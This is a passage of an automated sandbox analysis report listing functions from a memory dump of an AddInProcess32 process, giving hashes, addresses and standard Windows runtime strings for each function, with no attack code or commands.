            • Opcode ID: e79610fd9e33922dc848631254072d188bbfcf66c7be7a4174d7604a4770b452
            • Instruction ID: 61f379d4021ac6ef836f046dbcd62c4a1e09f77937d3e64aba447a33ccd484f6
            • Opcode Fuzzy Hash: e79610fd9e33922dc848631254072d188bbfcf66c7be7a4174d7604a4770b452
            • Instruction Fuzzy Hash: 0C90023120140806D604715848046860005D7D2301F55C015A702C655ED765CAA97232
            Function 018E2BA0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 69102fec8bc14dc695e14f2969b8834a6e3d712541acc2a3e9316c32b50e3267
            • Instruction ID: e29a22130c51a09cf82971df2f5b6ce71ad353ca7682865d95c706d35fccb553
            • Opcode Fuzzy Hash: 69102fec8bc14dc695e14f2969b8834a6e3d712541acc2a3e9316c32b50e3267
            • Instruction Fuzzy Hash: C190023160540806D650715844147460005D7D2301F55C015A202C654DC755CB6D77A2
            Function 018E2BE0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6dfe5481b2d7c29a297aa150e1965a0999b0f53684a8f40770155ffce484aa86
            • Instruction ID: a86dcc8a561d0cbd5fc1c1a296fd5817c718929d1beaaa74a4a4acb0b4829f2d
            • Opcode Fuzzy Hash: 6dfe5481b2d7c29a297aa150e1965a0999b0f53684a8f40770155ffce484aa86
            • Instruction Fuzzy Hash: B090023120544846D64071584404A460015D7D2305F55C015A206C694DD725CF6DB762
            Function 018E2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 326e2baf3ed8fb8c30eb3134c78f60525d2275faedf15d27765ea49643890ac0
            • Instruction ID: 139607dce6ff9e24a176c7dd3889a9f5b84b9d5174a324e7fc896538e011c2a4
            • Opcode Fuzzy Hash: 326e2baf3ed8fb8c30eb3134c78f60525d2275faedf15d27765ea49643890ac0
            • Instruction Fuzzy Hash: 9A90023120140806D6807158440464A0005D7D3301F95C019A202D654DCB15CB6D77A2
            Function 018E2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 648c8cf29610393b5c38c69a8074010efa2c7d3862951a4bc4b908c34aadc36e
            • Instruction ID: 3f65679dd6509d1570b1244eb416fd45a67f3bae9fc7bdc66fd15f50132d3296
            • Opcode Fuzzy Hash: 648c8cf29610393b5c38c69a8074010efa2c7d3862951a4bc4b908c34aadc36e
            • Instruction Fuzzy Hash: DB9002A1201540964A00B2588404B0A4505D7E2301B55C01AE305C560CC625CA699236
            Function 018E2AD0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 082952807f5e5a27aaf4ce546e6d1a31212f0c9a8bbab0f74b92584bc4a17570
            • Instruction ID: c9eac32901510168d3638301ee1c57649ea7257a6a6d1b9350b8e1d1af9ec275
            • Opcode Fuzzy Hash: 082952807f5e5a27aaf4ce546e6d1a31212f0c9a8bbab0f74b92584bc4a17570
            • Instruction Fuzzy Hash: BE900225211400070605B55807045070046D7D7351355C025F301D550CD721CA795222
            Function 018E2AF0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b833319456afd653406699e8ff495a78e0becef897b480f406f2f4e346cb5e7f
            • Instruction ID: 8e1fd83645a33a8336d7f59616dd929f40601d30454b1678a95d6954dfbba9a1
            • Opcode Fuzzy Hash: b833319456afd653406699e8ff495a78e0becef897b480f406f2f4e346cb5e7f
            • Instruction Fuzzy Hash: 81900225221400060645B558060450B0445E7D7351395C019F341E590CC721CA7D5322
            Function 018E2DB0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ca30bfc6496ae1a76ba5091f9862029f8e8bbfd4b85ec82ddfe14c855ae77396
            • Instruction ID: 7569680646e55dbab959ef0250005a8452edd48505f74fd6d484f262c2d65616
            • Opcode Fuzzy Hash: ca30bfc6496ae1a76ba5091f9862029f8e8bbfd4b85ec82ddfe14c855ae77396
            • Instruction Fuzzy Hash: F990023124140406D641715844046060009E7D2341F95C016A242C554EC755CB6EAB62
            Function 018E2DD0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2caeb08b91915e077926781fde5b9de354c4a270985d08eb36818e806be6bfb9
            • Instruction ID: dbc5f06dee9be9f8bedb3ca63622d0a3ffb1d58510192bedfc9e9ce584aa9060
            • Opcode Fuzzy Hash: 2caeb08b91915e077926781fde5b9de354c4a270985d08eb36818e806be6bfb9
            • Instruction Fuzzy Hash: 4E900221242441565A45B15844045074006E7E2341795C016A341C950CC626DA6ED722
            Function 018E2D00 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8be99aa8a9f8fd083248adc486b2e2cdf6da1da21827ab4d7f61fdaafb41e7b3
            • Instruction ID: 59be4b94334164c9cac8d2ec36ac062e478a6383286f0bd46a2124621d88d621
            • Opcode Fuzzy Hash: 8be99aa8a9f8fd083248adc486b2e2cdf6da1da21827ab4d7f61fdaafb41e7b3
            • Instruction Fuzzy Hash: 3590022120544446D60075585408A060005D7D2305F55D015A306C595DC735CA69A232
            Function 018E3D10 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: daaed8ec473cc1a4670c4d54ddb94da8f3400a4b84600490361b64157219b09a
            • Instruction ID: d63228e8a5200ab9eb8a569c9f6951efbc8ef1fe6c07ffc1534dfcb8875b07bd
            • Opcode Fuzzy Hash: daaed8ec473cc1a4670c4d54ddb94da8f3400a4b84600490361b64157219b09a
            • Instruction Fuzzy Hash: 8E900231202401469A4072585804A4E4105D7E3302B95D419A201D554CCA14CA795322
            Function 018E2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 353cc7ad62ea0c2ba463f05c7eb13feb5395111f0485b7db2a506bf84649ec31
            • Instruction ID: fc3e14527f19b47f40da25d2df6f1ce9546c41d8c67a60a94e40f515aba56500
            • Opcode Fuzzy Hash: 353cc7ad62ea0c2ba463f05c7eb13feb5395111f0485b7db2a506bf84649ec31
            • Instruction Fuzzy Hash: 5190022921340006D6807158540860A0005D7D3302F95D419A201D558CCA15CA7D5322
            Function 018E2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ba865aff2cbf1c1e96e704a63ee0cf365e0d8ba70d220c426e779d3bcdd7610b
            • Instruction ID: bdfd0d62aa115f107324c3f33b90c26920ddef99f2d1954b5ea32ef0557edce6
            • Opcode Fuzzy Hash: ba865aff2cbf1c1e96e704a63ee0cf365e0d8ba70d220c426e779d3bcdd7610b
            • Instruction Fuzzy Hash: 5D90022130140007D640715854186064005E7E3301F55D015E241C554CDA15CA6E5323
            Function 018E3D70 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dca85e80566fb71116055a66c3a9a80213fcf52333344346f27500fa5f0fba15
            • Instruction ID: 67a5bf733985b23e9c5afb5ad3d7cbfe369ce356b1afce3cf80123cbf583f317
            • Opcode Fuzzy Hash: dca85e80566fb71116055a66c3a9a80213fcf52333344346f27500fa5f0fba15
            • Instruction Fuzzy Hash: 3A90023520140406DA10715858046460046D7D2301F55D415A242C558DC754CAB9A222
            Function 018E2CA0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a980349aa3a13c00942c41d10a251c5c1be4dee3d71e5d83024fdb5f70e6a7e0
            • Instruction ID: bd7e9d8f084e3a048d3d7a220314d04c25b73a0c36fbd0482efad55b82e3a9a3
            • Opcode Fuzzy Hash: a980349aa3a13c00942c41d10a251c5c1be4dee3d71e5d83024fdb5f70e6a7e0
            • Instruction Fuzzy Hash: B390023120140406D600759854086460005D7E2301F55D015A702C555EC765CAA96232
            Function 018E2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 83954c91d061b059335233521a42534a339361b6b9238953b7575010d49cf453
            • Instruction ID: c5b7c86fab0d4f88b0a3ebcd014f7e0063e73d18f6c48a21ffddedb7d39509fd
            • Opcode Fuzzy Hash: 83954c91d061b059335233521a42534a339361b6b9238953b7575010d49cf453
            • Instruction Fuzzy Hash: 4F90022160540406D640715854187060015D7D2301F55D015A202C554DC759CB6D67A2
            Function 018E2CF0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a30f0f30bdf3e87ee6161599974f614bb026406216433cf6b2875dd1361d41fe
            • Instruction ID: 8030cf9d0186253ba8f66938e2d612c7fd292ea18a80e295e48f2a488efeb9b1
            • Opcode Fuzzy Hash: a30f0f30bdf3e87ee6161599974f614bb026406216433cf6b2875dd1361d41fe
            • Instruction Fuzzy Hash: E090023120140407D600715855087070005D7D2301F55D415A242C558DD756CA696222
            Function 018E2C60 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9eb77f188b90f35559c6add0e075cd2269de70970c93dcae0fceaf7e64c8430b
            • Instruction ID: 2b343ade601cb66ba02e7037b7820cf466809165dfe5dda0e330c50f65b861b7
            • Opcode Fuzzy Hash: 9eb77f188b90f35559c6add0e075cd2269de70970c93dcae0fceaf7e64c8430b
            • Instruction Fuzzy Hash: 1490023120140846D60071584404B460005D7E2301F55C01AA212C654DC715CA697622
            Function 018E2F90 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 217fd91b31c0ae4f167b683558add911b33930d365151372b22906fc210e86bf
            • Instruction ID: dce0a4a1283e08f1c002bdddc1f63f27f71a10219e33885438f8679d830fb0ca
            • Opcode Fuzzy Hash: 217fd91b31c0ae4f167b683558add911b33930d365151372b22906fc210e86bf
            • Instruction Fuzzy Hash: 6E90023120180406D6007158481470B0005D7D2302F55C015A316C555DC725CA696672
            Function 018E2FA0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1907aec8f329f703b97a03fff58166723e16f4b13055058f74ecb517e02f109a
            • Instruction ID: 21f98a9d9546e03e24835b7176840f75661157fae9026aebfdca1acc1e932245
            • Opcode Fuzzy Hash: 1907aec8f329f703b97a03fff58166723e16f4b13055058f74ecb517e02f109a
            • Instruction Fuzzy Hash: 8690023120180406D600715848087470005D7D2302F55C015A716C555EC765CAA96632
            Function 018E2FB0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dacf5e4242b6a46e395112dea53f4022459b5f98cc8e8cd2167be0a7db84d986
            • Instruction ID: b3e78a8ea0c623dd7e2052602772b269e6f384a59a76cf8333d5d362234fda07
            • Opcode Fuzzy Hash: dacf5e4242b6a46e395112dea53f4022459b5f98cc8e8cd2167be0a7db84d986
            • Instruction Fuzzy Hash: 44900221601400464640716888449064005FBE3311755C125A299C550DC659CA7D5766
            Function 018E2FE0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0895e26cccae673e6884646a5febefd8f821c5dac5a02cc19ae5249e429e44ac
            • Instruction ID: b871d35c272699c6530af8d3fd943df9ff756ca06bb07c423ea3194d005bf55a
            • Opcode Fuzzy Hash: 0895e26cccae673e6884646a5febefd8f821c5dac5a02cc19ae5249e429e44ac
            • Instruction Fuzzy Hash: 16900221211C0046D70075684C14B070005D7D2303F55C119A215C554CCA15CA795622
            Function 018E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d3119b091d6394799eab459d9a9c4b9ca38ba2f84239da03e23943622e17d59b
            • Instruction ID: b6d9cdc75c11681c0215dfc9a7ce43d82480ed0ce72ffc3fe78c4410d1ede8a1
            • Opcode Fuzzy Hash: d3119b091d6394799eab459d9a9c4b9ca38ba2f84239da03e23943622e17d59b
            • Instruction Fuzzy Hash: 4C90026134140446D60071584414B060005D7E3301F55C019E306C554DC719CE6A6227
            Function 018E2F60 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a2b05d9bc1a3c420cf8386d603495b19f8addf20cd1472df4c8e630c25629ce0
            • Instruction ID: c6495ae448b46442f041409e3cee8d3545101849b6af17cfbafba6d28973e253
            • Opcode Fuzzy Hash: a2b05d9bc1a3c420cf8386d603495b19f8addf20cd1472df4c8e630c25629ce0
            • Instruction Fuzzy Hash: B490026121140046D604715844047060045D7E3301F55C016A315C554CC629CE795226
            Function 018E2E80 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 26c7ccdb748964aab55483d96e261feab396c5f23ae015a210665a86ef7567c6
            • Instruction ID: 28ae1c1f2a46101f36063fbb77d1f38c979718ee21aa32ea952e11d3c9c6f1e7
            • Opcode Fuzzy Hash: 26c7ccdb748964aab55483d96e261feab396c5f23ae015a210665a86ef7567c6
            • Instruction Fuzzy Hash: 9690022160140506D60171584404616000AD7D2341F95C026A302C555ECB25CBAAA232
            Function 018E2EA0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3ccdef35ffecdb1fd3069509fd94853cdcb503f2aff7665f42c13c13ea5b20ed
            • Instruction ID: 77c07f78b990a51556965bbe4c46d45a39ed8231c2f901e069bcd819159bbfef
            • Opcode Fuzzy Hash: 3ccdef35ffecdb1fd3069509fd94853cdcb503f2aff7665f42c13c13ea5b20ed
            • Instruction Fuzzy Hash: 9F90027120140406D640715844047460005D7D2301F55C015A706C554EC759CFED6766
            Function 018E2EE0 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6e8704af9f8cc1ad4b330c09ae1941541ae365769687ab78dffe59fe460174dc
            • Instruction ID: de405e461e16dad9a34915b1a8024f21e368304756d11acfb0833ad6f23e0b3d
            • Opcode Fuzzy Hash: 6e8704af9f8cc1ad4b330c09ae1941541ae365769687ab78dffe59fe460174dc
            • Instruction Fuzzy Hash: 1590026120180407D640755848046070005D7D2302F55C015A306C555ECB29CE696236
            Function 018E2E30 Relevance: .0, Instructions: 4COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d2435a7b33b5e17a04d87889bd3274902278045e3415db37894264e3a07ccc14
            • Instruction ID: 0667e1fbac33f00f394536eb6e5e6458f5e56a3276b2252eb2ecba619e1ebd76
            • Opcode Fuzzy Hash: d2435a7b33b5e17a04d87889bd3274902278045e3415db37894264e3a07ccc14
            • Instruction Fuzzy Hash: A590022130140406D602715844146060009D7D3345F95C016E342C555DC725CB6BA233
            Function 018E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
            • Instruction ID: f21f465b1a5368b7652c6b218e7be056040d7ef3c0cf1aa6c0ceae07126be2a1
            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
            • Instruction Fuzzy Hash:
            Function 018E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: ___swprintf_l
            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
            • API String ID: 48624451-2108815105
            • Opcode ID: 858176113a9b0c3bdd121e82410b4b048d6731121a4cfc41537e466a904eaacd
            • Instruction ID: 9ccf296ddc0278d7caada25690a020f6b1daa9a5803455b6b48cdfb9aef45b91
            • Opcode Fuzzy Hash: 858176113a9b0c3bdd121e82410b4b048d6731121a4cfc41537e466a904eaacd
            • Instruction Fuzzy Hash: B451F6B6A0415ABFCB11EBAC889497EFBFDBB493407148229F5A9D3645D334DF4087A0
            Function 018D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
            Download Yara Rule
            Strings
            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01914787
            • Execute=1, xrefs: 01914713
            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01914655
            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01914742
            • ExecuteOptions, xrefs: 019146A0
            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01914725
            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019146FC
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
            • API String ID: 0-484625025
            • Opcode ID: d3d2e0c49e7e82629537dac92bd8ff3a42afc6ceb2a3c52de3005c9ac3b5999b
            • Instruction ID: 28675326be6aff16fbeeaa7f24bfe9b494c69dcf0aaa9d31c090642954e37454
            • Opcode Fuzzy Hash: d3d2e0c49e7e82629537dac92bd8ff3a42afc6ceb2a3c52de3005c9ac3b5999b
            • Instruction Fuzzy Hash: 7D51193160031E7AEF21EBA9EC89FA977B8EF19708F140499D609E7181EB709B41CF51
            Function 018EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: __aulldvrm
            • String ID: +$-$0$0
            • API String ID: 1302938615-699404926
            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
            • Instruction ID: 68c04f06da47faa090e12cadc26a40164b3c6c2c0947ad279e6050bb31d960a0
            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
            • Instruction Fuzzy Hash: DA81E070E452598FEF298E6CC8997FEBBF1AF47360F18411AD861E7691C7308A40CB51
            Function 018DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
            Download Yara Rule
            Strings
            • RTL: Resource at %p, xrefs: 01917B8E
            • RTL: Re-Waiting, xrefs: 01917BAC
            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01917B7F
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
            • API String ID: 0-871070163
            • Opcode ID: f451712a75d600787856c8a791ec2f6f429ef70a42280eeabd5485304560f217
            • Instruction ID: 0d6fcce33fe10006ad21dfc200463afce24f1c675a6c55546ba4958ba839db45
            • Opcode Fuzzy Hash: f451712a75d600787856c8a791ec2f6f429ef70a42280eeabd5485304560f217
            • Instruction Fuzzy Hash: F741E3313007079FDB25DE29C840B6AB7E5EF9A711F110A2DF95AD7280DB31E645CB91
            Function 018DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
            Download Yara Rule
            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0191728C
            Strings
            • RTL: Resource at %p, xrefs: 019172A3
            • RTL: Re-Waiting, xrefs: 019172C1
            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01917294
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
            • API String ID: 885266447-605551621
            • Opcode ID: bd7085361bc51ae2dcd7faa9b0bb15c41431e88e539b09bd4ed18eff24b2ac08
            • Instruction ID: 5ee761e6f802504b6e0eec760d586b5a9369edf832ee05e43891d573f2065749
            • Opcode Fuzzy Hash: bd7085361bc51ae2dcd7faa9b0bb15c41431e88e539b09bd4ed18eff24b2ac08
            • Instruction Fuzzy Hash: 4941023170030BABD725DE69CC81FA6B7A5FF96714F200A19F959EB240DB21E982C7D1
            Function 018E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
            Download Yara Rule
            APIs
            Strings
